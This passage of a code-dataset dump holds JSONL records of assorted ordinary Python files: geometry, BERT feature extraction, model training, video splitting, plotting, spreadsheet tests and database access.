lineB[0][1]\n Bx2 = lineB[1][0]\n By2 = lineB[1][1]\n bA, slopeA = mxpb(lineA)\n bB, slopeB = mxpb(lineB)\n if (slopeA is \"hor\" and slopeB is \"hor\") or (slopeA is \"ver\" and slopeB is \"ver\"):\n return \"Parallel\"\n if (bA is False and bB is False):\n if slopeA is \"hor\":\n x = Bx1\n y = Ay1\n elif slopeB is \"hor\":\n x = Bx1\n y = Ay1\n elif slopeA is \"hor\" and bB is not False:\n x = (Ay1 - bB)/slopeB\n y = Ay1\n elif slopeB is \"hor\" and bB is not False:\n x = (By1 - bA)/slopeA\n y = By1\n elif slopeA is \"ver\" and bB is not False:\n x = Ax1\n y = Ax1 * slopeB + bB\n elif slopeB is \"ver\" and bB is not False:\n x = Bx1\n y = Bx1 * slopeA + bA\n elif slopeB is slopeA:\n return \"Parallel\"\n else:\n x = (bB - bA)/(slopeA - slopeB)\n y = x * slopeA + bA\n if ((x >= Ax1 and x <= Ax2) or (x >= Ax2 and x <= Ax1))\\\n and ((x >= Bx1 and x <= Bx2) or (x >= Bx2 and x <= Bx1))\\\n and ((y >= Ay1 and y <= Ay2) or (y >= Ay2 and y <= Ay1)) \\\n and ((y >= By1 and y <= By2) or (y >= By2 and y <= By1)):\n return x, y\n return False\n\ndef makeLines(range):\n return [[random.randint(-range, range), random.randint(-range, range)],\\\n [random.randint(-range, range), random.randint(-range, range)]],\\\n [[random.randint(-range, range), random.randint(-range, range)], \\\n [random.randint(-range, range), random.randint(-range, range)]]\n\nline1, line2 = makeLines(100)\nprint(line1)\nprint(line2)\nprint(intersect(line1, line2))","sub_path":"Coding Challenges/Exercise Problems/H Moderate/16.3 Intersection.py","file_name":"16.3 Intersection.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"647491018","text":"#!/usr/bin/env python3\nimport json\nimport transformers\nfrom transformers import (BertTokenizer, BertModel, BertConfig,\n AlbertModel, AlbertConfig, AlbertTokenizer,\n ElectraConfig, ElectraTokenizer, ElectraModel,\n )\nimport numpy as np\nimport torch\nimport argparse\nimport os\nfrom multiprocessing import Pool\nfrom tqdm import tqdm\nfrom torch.utils.data import Dataset\nfrom torch.nn.utils.rnn import pad_sequence\nimport pickle\n\ndef collate_fn(batch):\n batch.sort(key=lambda x: x[0].shape[0] , reverse=True)\n input_ids, re_2_o, attn_mask, labels = zip(*batch)\n input_ids = pad_sequence(input_ids, True)\n #re_2_o = pad_sequence(re_2_o[0], True)\n attn_mask = pad_sequence(attn_mask, True)\n return input_ids, attn_mask, re_2_o, labels\n\nclass Sentence(Dataset):\n def __init__(self, data):\n self.data = data\n def __len__(self):\n return len(self.data)\n def __getitem__(self, idx):\n input_ids, re_2_o, labels = self.data[idx]\n return input_ids, np.asarray(re_2_o), torch.ones_like(input_ids).float(), labels\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", type = str, help = \"LM used to extract features\")\n parser.add_argument(\"-i\", \"--input\", type = str, help = \".json file to be retokenized\")\n parser.add_argument(\"-o\", \"--output\", type = str, help = \"output feature directory\")\n parser.add_argument('--layer', type = int, help = \"layer from which feature should be extracted\")\n parser.add_argument(\"-c\", \"--config\", type = str, help = \"config for model\")\n parser.add_argument(\"-t\", \"--tokenizer\", type = str, help = \"path to vocab file for tokenizer\")\n parser.add_argument(\"-l\", \"--label\", type = str, help = \"Path to label.txt\")\n parser.add_argument(\"-p\", \"--probe\", type = str, help = \"Probed task name\")\n parser.add_argument(\"--data_type\", type = str, help = \"train, dev, or test set\")\n args = parser.parse_args()\n\n label_dict = {}\n with open(args.label, 'r') as f:\n line_id = 0 \n while True:\n line = f.readline()\n if line == '': break\n line = line.rstrip()\n label_dict[line] = line_id\n line_id += 1\n \n if 'albert' in args.model:\n model_type = 'albert'\n tokenizer = AlbertTokenizer(vocab_file = args.tokenizer)\n config = AlbertConfig.from_json_file(args.config)\n model = AlbertModel.from_pretrained(pretrained_model_name_or_path = None,\n config = config,\n state_dict = torch.load(args.model))\n elif 'bert' in args.model:\n model_type = 'bert'\n tokenizer = BertTokenizer(vocab_file = args.tokenizer)\n config = BertConfig.from_json_file(args.config)\n model = BertModel.from_pretrained(pretrained_model_name_or_path = None,\n config = config,\n state_dict = torch.load(args.model))\n elif 'electra' in args.model:\n model_type = 'electra'\n tokenizer = ElectraTokenizer(vocab_file = args.tokenizer)\n config = ElectraConfig.from_json_file(args.config)\n model = ElectraModel.from_pretrained(pretrained_model_name_or_path = None,\n config = config,\n state_dict = torch.load(args.model))\n else:\n raise NotImplementedError(\"The model is currently not supported\")\n \n def process_line(line):\n data = json.loads(line)\n tokens = data['text'].split(' ')\n labels = data['targets']\n return tokens, labels\n\n def retokenize(tokens_labels):\n tokens, labels = tokens_labels \n retokenized = []\n re_2_o = [] # same length as retokenized sequence, store the mapping of index from retokenized to original seq\n for word_id, token in enumerate(tokens):\n token = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(token))\n retokenized.extend(token)\n re_2_o.extend([word_id for _ in range(len(token))])\n retokenized.insert(0, tokenizer.cls_token_id)\n retokenized.append(tokenizer.sep_token_id)\n input_ids = torch.tensor(retokenized)\n return input_ids, re_2_o, labels\n\n pool = Pool(4)\n with open(args.input, 'r') as f:\n processed_data = pool.map(process_line, f)\n pool.close()\n pool.join()\n #print(len(processed_data))\n\n processed_data = list(map(retokenize, processed_data))\n\n print(\"Total number of sentences: \", len(processed_data))\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n model.eval().to(device)\n\n result = []\n\n dataloader = torch.utils.data.DataLoader(Sentence(processed_data),\n batch_size = 48, \n num_workers = 32,\n collate_fn = collate_fn)\n\n def post_process(fn_input):\n feature = [] \n model_output, re_2_o, labels, seq_len, input_ids = fn_input\n model_output = model_output[:seq_len][1:-1]\n for target in labels:\n span1 = []\n for pos in range(target['span1'][0], target['span1'][1]):\n select = np.where(np.asarray(re_2_o) == pos)[0]\n span1.extend(model_output[select])\n span1 = np.stack(span1).mean(0)\n# print(span1.shape)\n if 'span2' in target.keys():\n span2 = []\n for pos in range(target['span2'][0], target['span2'][1]):\n select = np.where(np.asarray(re_2_o) == pos)[0]\n span2.extend(model_output[select])\n span2 = np.stack(span2).mean(0)\n else:\n span2 = None\n# print(target['label']) \n label = label_dict[target['label']]\n if span2 is not None:\n feature.append([label, span1, span2])\n else:\n feature.append([label, span1])\n return feature\n\n\n for input_ids, attn_mask, re_2_o, labels in tqdm(dataloader):\n with torch.no_grad():\n model_output = model(input_ids.to(device), \n attention_mask = attn_mask.to(device),\n output_attentions = True, \n output_hidden_states = True)\n if model_type == 'electra':\n model_output = model_output[1][args.layer].detach().cpu().numpy() ## TODO: if albert or bert: get [2] if electra, get [?]\n else:\n model_output = model_output[2][args.layer].detach().cpu().numpy() ## TODO: if albert or bert: get [2] if electra, get [?]\n seq_len = attn_mask.sum(-1).cpu().long().numpy()\n map_input = [*zip(model_output, re_2_o, labels, seq_len, input_ids)]\n for x in map(post_process, map_input):\n result.extend(x)\n\n #processed_data = list(map(post_process, result))\n processed_data = result\n step = args.model.split('_')[-1].split('.')[0]\n output_dir = os.path.join(args.output, args.probe + '-' + args.data_type + '-' + model_type + '-' + step + '.pkl')\n with open(output_dir, 'wb') as f:\n pickle.dump(processed_data, f)\n \n","sub_path":"Sec-3:Edge-Probing/preprocess/multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":6501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"543337522","text":"import torch as th\n\nimport torch.nn as nn\nfrom sch import SchNetModel\nfrom mgcn import MGCNModel\nfrom torch.utils.data import DataLoader\nfrom Alchemy_dataset import TencentAlchemyDataset, batcher\n\n\ndef train(model=\"sch\", epochs=80, device=th.device(\"cpu\")):\n alchemy_dataset = TencentAlchemyDataset()\n alchemy_loader = DataLoader(dataset=alchemy_dataset,\n batch_size=20,\n collate_fn=batcher(device),\n shuffle=False,\n num_workers=0)\n\n if model == \"sch\":\n model = SchNetModel(norm=True, output_dim=12)\n elif model == \"mgcn\":\n model = MGCNModel(norm=True, output_dim=12)\n\n model.set_mean_std(alchemy_dataset.mean, alchemy_dataset.std, device)\n model.to(device)\n \n loss_fn = nn.MSELoss()\n MAE_fn = nn.L1Loss()\n optimizer = th.optim.Adam(model.parameters(), lr=0.0001)\n\n for epoch in range(epochs):\n\n w_loss, w_mae = 0, 0\n model.train()\n\n for idx, batch in enumerate(alchemy_loader):\n\n res = model(batch.graph)\n loss = loss_fn(res, batch.label)\n mae = MAE_fn(res, batch.label)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n w_mae += mae.detach().item()\n w_loss += loss.detach().item()\n\n w_mae /= idx + 1\n print(\"Epoch {:2d}, loss: {:.7f}, mae: {:.7f}\".format(\n epoch, w_loss, w_mae))\n\n\nif __name__ == \"__main__\":\n device = th.device('cuda' if th.cuda.is_available() else 'cpu')\n train(\"sch\", 80, device)\n","sub_path":"dgl/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"203860670","text":"\nvar = 1\nvar2 = '2'\nvar3 = 'Privet Vitalik'\nvar_list = [var, var2, {'d': 323, 1: 3424}]\nvar_list.append(var3)\nnew_list = [print, print]\n\nnew_list.append(var_list)\n\nget_print = new_list[-1]\nsecond_list = get_print\n\nsecond_list.append('213213213123123')\n\nvar_tuple = (1, 2, 3, 3, '243234', 'a', 'a', 10, 10)\n\nvar_dict = {\n 1: 'New car',\n var2: var_list,\n 'Vasya': 33,\n\n}\nprint(var_dict[var2])\n","sub_path":"base_type/less.py","file_name":"less.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"154083484","text":"from apr03a import *\n\nif __name__ == \"__main__\":\n jane = Manager(\"Jane Doe\", 100000)\n john = Employee(\"John Brown\", \"tech support\", 80000)\n kate = Employee(\"Kate Smith\", \"tech support\", 75000)\n betty = Employee(\"Betty Zubert\", \"secretary\", 40000)\n anne = Employee(\"Anne Graham\", \"janitor\", 35000)\n sam = Employee(\"Sam Simon\", \"personal trainer\", 50000)\n\n sales = Department(jane, john, kate, betty, anne)\n\n sales[3] = sam\n\n lnames = []\n for e in sales:\n lnames.append(e.lastname())\n lnames.sort()\n print(\"\\nDepartment members sorted by last name: \\n\")\n for l in lnames:\n print(l)\n\n print(\"\\nSalary Data: \\n\")\n\n for i in range(len(sales)):\n print(\"%-12s $%7d\"%(sales[i].lastname(), sales[i].salary()))\n\n\n\n\n\n","sub_path":"OOP - Python/CODE notes/CODEnotes/apr03atest2-1.py","file_name":"apr03atest2-1.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21624894","text":"# coding=utf-8\nimport time\n\nimport os\n\nimport cv2\nimport random\n\n\ndef division(path, path2):\n file_list = os.listdir(path)\n for file in file_list:\n if os.path.splitext(file)[1] != '.mp4':\n continue\n\n # 定义此文件号\n file_temp = \"temp\" + time.strftime('_%Y%m%d_%H%M%S_', time.localtime())\n file_capture = cv2.VideoCapture(path + file)\n\n # 判断视频是否打开\n if not file_capture.isOpened():\n return False\n\n # 获取原视频的帧率\n fps = file_capture.get(cv2.CAP_PROP_FPS)\n # 获取原视频帧的大小\n size = (int(file_capture.get(cv2.CAP_PROP_FRAME_WIDTH)),\n int(file_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n # 获取原视频的总帧数\n frame_count = file_capture.get(cv2.CAP_PROP_FRAME_COUNT)\n # 定义帧计数\n i = 1\n # 定义文件序号\n j = 1\n\n fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n video_writer = cv2.VideoWriter(path2 + file_temp + str(j) + '.mp4', fourcc, random.randint(-4, 4) + fps, size)\n\n # 读第一帧\n success, frame = file_capture.read()\n\n print(\"正在启动文件分割\" + file)\n while success:\n # 写此文件\n video_writer.write(frame)\n i = i + 1\n # 每900帧截成一个新文件\n if i % 900 == 0:\n print(\"已完成:\" + str(int(i / frame_count * 100)) + \"%\")\n j = j + 1\n # 声明新文件,且对fps进行变速\n video_writer = cv2.VideoWriter(path2 + file_temp + str(j) + '.mp4', fourcc,\n random.randint(-20, 20) + fps, size)\n # 加载 下一个文件\n success, frame = file_capture.read()\n print(\"分割完成\" + file)\n\n merge(path2, file, file_temp, j, fps, size)\n # return j\n\n\n# 传入 生成目标位置,文件名, 临时文件名,临时文件最大号,原文件fps,原文件size\ndef merge(path, file, file_temp, j, fps, size):\n fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n file_capture = cv2.VideoCapture(path + file_temp + str(1) + '.mp4')\n # 判断视频是否打开\n if not file_capture.isOpened():\n return False\n\n # 定义最终文件\n video_writer = cv2.VideoWriter(path + file, fourcc, fps, size)\n for i in range(1, j):\n file_capture = cv2.VideoCapture(path + file_temp + str(i) + '.mp4')\n # 判断视频是否打开\n if not file_capture.isOpened():\n return False\n\n # 读第一帧\n success, frame = file_capture.read()\n\n print(\"正在合并文件\" + file + \"(\" + str(i) + \"/\" + str(j) + \")\")\n while success:\n video_writer.write(frame)\n success, frame = file_capture.read()\n os.remove(path + file_temp + str(i) + '.mp4')\n print(\"合并文件\" + file + \"(完成)\")\n try:\n os.remove(path + file_temp + str(j) + '.mp4')\n except Exception as e:\n pass\n\n\nif __name__ == '__main__':\n try:\n # 硬盘路径(原视频存放路径)\n path = os.path.dirname(os.path.realpath(__file__)) + \"/\"\n # 切割后的视频存放路径\n path2 = path + \"process\"\n if not os.path.exists(path2):\n os.mkdir(path2, 0o777)\n if not os.path.exists(path2):\n print(\"警告,程序出错。无法新建process文件夹,请手动建立\")\n else:\n path2 = path2 + \"/\"\n division(path, path2)\n except Exception as e:\n print(\"警告,程序出错:\")\n print(e)\n","sub_path":"Video/SpeedAjustOpenCV.py","file_name":"SpeedAjustOpenCV.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"30808349","text":"\r\nfrom rest_framework import serializers\r\nfrom aporte.models import Aporte, Grupo#, Corrige\r\n\r\nclass AporteSerializer(serializers.ModelSerializer):\r\n grupo = serializers.CharField()\r\n\r\n class Meta:\r\n model = Aporte\r\n fields = '__all__'\r\n\r\n def to_representation(self, instance):\r\n data = super(AporteSerializer, self).to_representation(instance)\r\n data['selic'] = instance.present_value() or None\r\n data['grupo_name'] = instance.grupo.name or None\r\n return data\r\n\r\n def validate(self, data):\r\n grupo = data.get('grupo')\r\n try:\r\n grupo_id = Grupo.objects.get(name=grupo)\r\n except:\r\n g = Grupo(name=grupo)\r\n g.save()\r\n grupo_id = Grupo.objects.get(name=grupo)\r\n data.update({'grupo': grupo_id})\r\n return data\r\n\r\n# class CorrigeSerializer(serializers.ModelSerializer):\r\n# class Meta:\r\n# model = Corrige\r\n# fields = '__all__'\r\n\r\n# def to_representation(self, instance):\r\n# data = super(CorrigeSerializer, self).to_representation(instance)\r\n# data['selic'] = instance.present_value() or None\r\n# return data\r\n","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"448515123","text":"#!/usr/bin/python3\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport openpyxl\n\nfile = '2017-07-03 10_41 - Richa Upadhy.xlsx'\n\n\nbook3 = openpyxl.load_workbook(file)\nname = book3.get_sheet_names()[0]\n\ndata_part = pd.read_excel(file, sheet_name=name)\nchakra_values = data_part.iloc[22:29,1:3]\nchakra_symm = data_part.iloc[40:47,1:3]\n\nchakra_values1 = chakra_values.values.tolist()\nchakra_symm1 = chakra_symm.values.tolist()\nprint(chakra_symm1)\n#print(type(chakra_values1))\n#print(len(chakra_values1))\n#print(chakra_values1[0][0])\n\n\n# allocating the values in the corresponding list\nvalues=[]\nx1=[]\nasymm=[]\nx2=[]\nfor i in range(0,len(chakra_values1)):\n\tvalues.append(chakra_values1[i][1])\n\tx1.append(chakra_values1[i][0])\n\nfor i in range(0,len(chakra_symm1)):\n\tasymm.append(chakra_symm1[i][0])\n\tx2.append(chakra_symm1[i][1])\n\n\n# plotting the first graph\n\nplt.figure(1)\nplt.title('Values')\nplt.xlabel('chakras')\nplt.ylabel('values')\n\nbars = plt.bar( x1, values, 0.6, color='blue')\nfor bar in bars:\n\ty_val = bar.get_height()\n\tplt.text(bar.get_x() + 0.1, y_val + 0.1, y_val)\n\nplt.axis([-1,7,0,10])\n\n\n# plotting the second graph\n\nprint(x2)\nprint(asymm)\nplt.figure(2)\nplt.title('Asymmetry')\nplt.xlabel('chakras')\nplt.ylabel('asymmetric values')\n\nplt.plot( x2, asymm, 'ro', markersize=20)\nplt.plot([0.0,0.0],[-0.5,6.5], 0.1,color='blue')\n\nplt.plot([-1.9,1.9],[6.0,6.0], 0.1, color='blue')\nplt.plot([-1.9,1.9],[5.0,5.0], 0.05, color='blue')\nplt.plot([-1.9,1.9],[4.0,4.0], 0.05, color='blue')\nplt.plot([-1.9,1.9],[3.0,3.0], 0.05, color='blue')\nplt.plot([-1.9,1.9],[2.0,2.0], 0.05, color='blue')\nplt.plot([-1.9,1.9],[1.0,1.0], 0.05, color='blue')\nplt.plot([-1.9,1.9],[0.0,0.0], 0.05, color='blue')\n\nplt.axis([-2,2,-1,7])\nplt.show()\n","sub_path":"individual_graph/chakra_plot.py","file_name":"chakra_plot.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"79940317","text":"import xlrd\nimport xlwt\n\nfilepath='E:\\\\333.xlsx'\n\nfiletable=xlrd.open_workbook(filepath)\n\nfilesheets=filetable.sheets()\n\nfor i in range(len(filesheets)):\n print(filesheets[i].name)\n\n# filewrite=xlwt.Worksheet(filesheets[1],filepath,cell_overwrite_ok=True)\n\nws=xlwt.Workbook(filepath)\nwb=ws.add_sheet(\"123\")\n\nstyle0=xlwt.easyxf('font:name 微软雅黑,color-index black, bold on')\n\n\nwb.write(1,2,'测试写入')\n\nfor i in range(len(filesheets)):\n print(filesheets[i].name)\n#\n# ws.save('E:\\\\333.xls')\n\n\n\n","sub_path":"test_Interface/test_write.py","file_name":"test_write.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"15139221","text":"import os\nimport argparse\nimport pickle\nimport json\nimport glob\nfrom pathlib import Path\nfrom tqdm import tqdm\nfrom multiprocessing import Pool, cpu_count\nfrom toolz.itertoolz import partition_all\nfrom collections import namedtuple\n\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', help='read data from',\n type=str, default='/mnt/data/bert_wiki/wikidoc.all')\nparser.add_argument('--output', help='save data to',\n type=str, default='/mnt/data/pretrain_data/wikidoc.tk')\nparser.add_argument(\"--bert_model\", default=None, type=str, required=True,\n help=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n \"bert-large-uncased, bert-base-cased, bert-base-multilingual, bert-base-chinese.\")\nparser.add_argument('--cache_dir', help='cache dir',\n type=str, default='/mnt/data/bert-uncased-pretrained-cache/')\nparser.add_argument(\"--do_lower_case\", action='store_true',\n help=\"Set this flag if you are using an uncased model.\")\ndefault_process_count = max(1, cpu_count() - 1)\nargs = parser.parse_args()\n\n\ndef is_invalid(tk_list):\n if len(tk_list) >= 8:\n n_subword = 0\n for tk in tk_list:\n if tk.startswith('##'):\n n_subword += 1\n if float(n_subword)/float(len(tk_list)) > 0.7:\n return True\n return False\n\n\ndef get_token_id(tokenizer, tok_list):\n ids = []\n for tok in tok_list:\n ids.append(str(tokenizer.vocab[tok]))\n return ids\n\ndef process_doc(_file, output_file):\n # avoid access url too frequently\n if Path(os.path.join(args.cache_dir, 'vocab.txt')).exists():\n tokenizer_load_path = args.cache_dir\n else:\n tokenizer_load_path = args.bert_model\n tokenizer = BertTokenizer.from_pretrained(\n tokenizer_load_path, do_lower_case=args.do_lower_case, cache_dir=args.cache_dir)\n\n writer = open(output_file, 'w', encoding='utf-8')\n i = 0\n with open(_file, 'r', encoding='utf-8') as reader:\n for line in reader:\n i += 1\n \n if i > 500000:\n break\n line = line.replace('#', '')\n tk_list = tokenizer.tokenize(line)\n ids = get_token_id(tokenizer, tk_list)\n writer.write(' '.join(tk_list))\n writer.write('\\t')\n writer.write('\\t'.join(ids))\n writer.write('\\n')\n writer.close()\n \ndef main():\n process_doc(args.input, args.output)\n\nif __name__ == '__main__':\n main()\n","sub_path":"tokenize_corpus.py","file_name":"tokenize_corpus.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"190630784","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PIL import Image\nimport os, re, sys\n\ndef returnFormat(format):\n if format == \"bmp\":\n return \"BMP\"\n elif format == \"jpg\":\n return \"JPEG\"\n elif format == \"png\":\n return \"PNG\"\n elif format == \"gif\":\n return \"GIF\"\n else:\n print(format + \" は対応していません。\")\n sys.exit()\n\nif __name__ == '__main__':\n if len(sys.argv) > 4:\n fileName = sys.argv[1]\n format = sys.argv[2]\n\n img = Image.open(fileName, \"r\")\n width, height = img.size\n\n fileName = re.search(\"(? 2:\n mean = np.load(sys.argv[2]) - mean\nelse:\n mean = np.zeros(shape=3, dtype='float')\n\nn_classes = 4\n#FACTORS = [0.25]\nFACTORS = [1., 0.75, 0.5, 0.25, 0.1]\n\ndef sliding_window(image, stepSize, windowSize):\n # slide a window across the imag\n for y in xrange(0, image.shape[0] - windowSize[0] + stepSize, stepSize):\n for x in xrange(0, image.shape[1] - windowSize[1] + stepSize, stepSize):\n # yield the current window\n res_img = image[y:y + windowSize[1], x:x + windowSize[0]]\n change = False\n if res_img.shape[0] != windowSize[1]:\n y = image.shape[0] - windowSize[1]\n change = True\n if res_img.shape[1] != windowSize[0]:\n x = image.shape[1] - windowSize[0]\n change = True\n if change:\n res_img = image[y:y + windowSize[1], x:x + windowSize[0]]\n yield (x, y, x + windowSize[0], y + windowSize[1], res_img)\n\n\nrandom_seed = 0\nrandom.seed(random_seed)\nnp.random.seed(random_seed)\n\nlbl = [\"Normal\", \"Benign\", \"Invasive\", \"InSitu\"]\n\nflatten = lambda l: [item for sublist in l for item in sublist]\nlabels = list(set(flatten([l.split(' ') for l in lbl])))\n\nlabel_map = {l: i for i, l in enumerate(labels)}\ninv_label_map = {i: l for l, i in label_map.items()}\n\n# use ResNet50 model extract feature from fc1 layer\nbase_model = ResNet50(weights='imagenet', pooling=max, include_top = False)\ninput = Input(shape=(224,224,3),name = 'image_input')\nx = base_model(input)\nx = Flatten()(x)\nmodel = Model(inputs=input, outputs=x)\n\nX_mat = []\ny_mat = []\n\ntags = sys.argv[1]\nif basename(tags)[0] == \"n\":\n pre = \"Normal\"\nelif basename(tags)[0] == \"b\":\n pre = \"Benign\"\nelif basename(tags)[0:2] == \"iv\":\n pre = \"Invasive\"\nelif basename(tags)[0:2] == \"is\":\n pre = \"InSitu\"\n\nimage = imread(tags).astype('uint8')\nimg_feat_list = []\nfor fact in FACTORS:\n if fact == 0.1:\n img_scale = resize(image, (224,224))\n img_scale = img_as_ubyte(img_scale)\n elif fact != 1.:\n img_scale = rescale(image, fact)\n img_scale = img_as_ubyte(img_scale)\n else:\n img_scale = image\n img_scale = img_scale.astype(float)\n img_scale = img_scale - mean\n stepSize = 224\n windowSize = (224, 224)\n for x, y, x_e, y_e, x in sliding_window(img_scale, stepSize, windowSize):\n x = x.astype(float)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n\n features = model.predict(x)\n features_reduce = features.squeeze()\n img_feat_list.append(features_reduce)\n\nmatrix_img_feat = np.column_stack(img_feat_list)\nfor i in range(matrix_img_feat.shape[0]):\n matrix_img_feat[i] = np.sort(matrix_img_feat[i])\n\n\nX_mat.append(matrix_img_feat.flatten())\n\ntargets = np.zeros(n_classes)\ntargets[label_map[pre]] = 1\ny_mat.append(targets)\n\n\nX = np.array(X_mat)\n\ntrain_ResNet = pd.DataFrame(X)\ndata = {'label': [label_map[pre]]}\ny_pd = pd.DataFrame(data, columns=['label'])\ntrain_ResNet = pd.concat([y_pd, train_ResNet], axis = 1)\np = train_ResNet.shape[1]\nvec_res = train_ResNet.as_matrix().reshape(p)\nvec_res_p = np.zeros(p+1, dtype='float')\nvec_res_p[0] = label_map[pre]*100 + int(tags.split(\".\")[0][-3:]) - 1\nvec_res_p[1:] = vec_res\nnp.save(basename(tags).replace('.tif', '.npy'), vec_res_p)\n","sub_path":"partA/ExtractFromResNet.py","file_name":"ExtractFromResNet.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18345371","text":"'''\nCalcualtes ReducerDataSkew heuristic'\nchecks for any skew in data of reducer input.\n'''\nfrom main import *\n\ndef ReducerDataSkew(i):\t\n\n\theuristic = heuristic_class()\n\tthresh_val = getattr(heuristic,reduce_threshold)\n\tval = getattr(heuristic,reduce_value)\n\tinsert = getattr(heuristic,insert_data)\n\t\n\tredskew_threshold = float(thresh_val(i,\"REDUCE_SHUFFLE_BYTES\"))\n\tredskew_value = val(i,\"REDUCE_SHUFFLE_BYTES\")\n\t\n\tpercent = 0.02*redskew_threshold\n\tif redskew_threshold - percent <= redskew_value <= redskew_threshold + percent:\n\t\tseverity=\"LOW\"\n\t\tscore=redskew_value\n\telse:\n\t\tseverity = \"HIGH\"\n\t\tscore=redskew_value\n\tinsert(i,score,severity,\"ReducerDataSkew\")\n\tprint (severity,score,i[0],\"ReducerDataSkew\")\n","sub_path":"heuristics/ReducerDataSkew.py","file_name":"ReducerDataSkew.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"558300209","text":"__all__ = ['crossValStatsMonParser', 'CrossValStatsMonParser']\n\nfrom RingerCore import ArgumentParser, BooleanStr, NotSet\n\n################################################################################\n# Create cross valid monitoring job parser file related objects\n################################################################################\n\ndef CrossValStatsMonParser():\n crossValStatsMonParser = ArgumentParser(add_help = False, \n description = 'Retrieve cross-validation-monitoring information performance.',\n conflict_handler = 'resolve')\n reqArgs = crossValStatsMonParser.add_argument_group( \"required arguments\", \"\")\n reqArgs.add_argument('-f', '--file', action='store', required = True,\n help = \"\"\"The crossvalidation data files or folders that will be used to run the\n analysis.\"\"\")\n reqArgs.add_argument('-d','--dataPath', default = None, required = True,\n help = \"\"\"The tuning data file to retrieve the patterns.\"\"\")\n optArgs = crossValStatsMonParser.add_argument_group( \"optional arguments\", \"\")\n optArgs.add_argument('--debug', default=False, type=BooleanStr,\n help = \"Debug mode\")\n optArgs.add_argument('--grid', default=False, type=BooleanStr,\n help = \"Enable the grid filter tag.\")\n optArgs.add_argument('--doBeamer', default=False, type=BooleanStr,\n help = \"Enable the beamer creation.\")\n optArgs.add_argument('--doShortSlides', default=False, type=BooleanStr,\n help = \"Enable the beamer short slides.\")\n optArgs.add_argument('--reference', default=None,\n help = \"The reference string to be used.\")\n optArgs.add_argument('--output', '-o', default=\"report\", \n help = \"the output file path to the data\"\n )\n optArgs.add_argument('--choicesfile', '-c', default=None, \n help = \"the .mat file with the neuron choices \"\n )\n return crossValStatsMonParser\ncrossValStatsMonParser = CrossValStatsMonParser()\n","sub_path":"TuningTools_old/python/parsers/CrossValidStatMon.py","file_name":"CrossValidStatMon.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"54522349","text":"#!/usr/bin/python\nimport pymysql\nimport pika\nimport datetime\nimport pymongo\nfrom pymongo import MongoClient\n\n\nimport pymysql\nfrom pymongo import MongoClient\nfrom Common import Commmon\n\n\nimport csv\n\nclient = MongoClient('localhost', 27017)\nmongodb = client.HTMLDumps\n#reportPath = 'http://ecxusubt07.eclerx.com:5000/fetchreport/'\n\nreportPath = \"http://127.0.0.1:5000/fetchreport/\"\n\n\n# db = pymysql.connect(host=\"192.168.8.67\",\n# user=\"tech\",\n# passwd=\"eclerx#123\",\n# db=\"eCube_Centralized_DB\")\n\n\n# db = pymysql.connect(host=\"localhost\",\n# user=\"tech\",\n# passwd=\"eclerx#123\",\n# db=\"eCube_Centralized_DB\")\n\ndb = pymysql.connect(host=\"192.168.8.37\",\n user=\"tech\",\n passwd=\"eclerx#123\",\n db=\"eCube_Centralized_DB\")\n\n# db = pymysql.connect(host=\"192.168.131.23\",\n# user=\"tech\",\n# passwd=\"Eclerx#123\",\n# db=\"eCube_Centralized_DB\")\n\n\nclass DBconnection:\n\n ##### Report QUEUE\n\n def GetInQueRequest(self):\n\n cur = db.cursor()\n print(\"OK Connected\")\n try:\n cur.callproc('sp_GetInQueRequest', args=(\"\"))\n db.commit()\n except Exception as e:\n print(\"Stored Procedure not properly execued\")\n\n db.close()\n return cur\n\n def GetCrawlResponse(self,id):\n resultData = []\n\n\n result = mongodb.CrawlResponse.find({'RequestRunId': int(id)})\n print(\"Report Get Crawl Function Called\",result)\n\n for item in result:\n\n finaldict = Commmon.entries_to_remove(item)\n resultData.append(finaldict)\n return 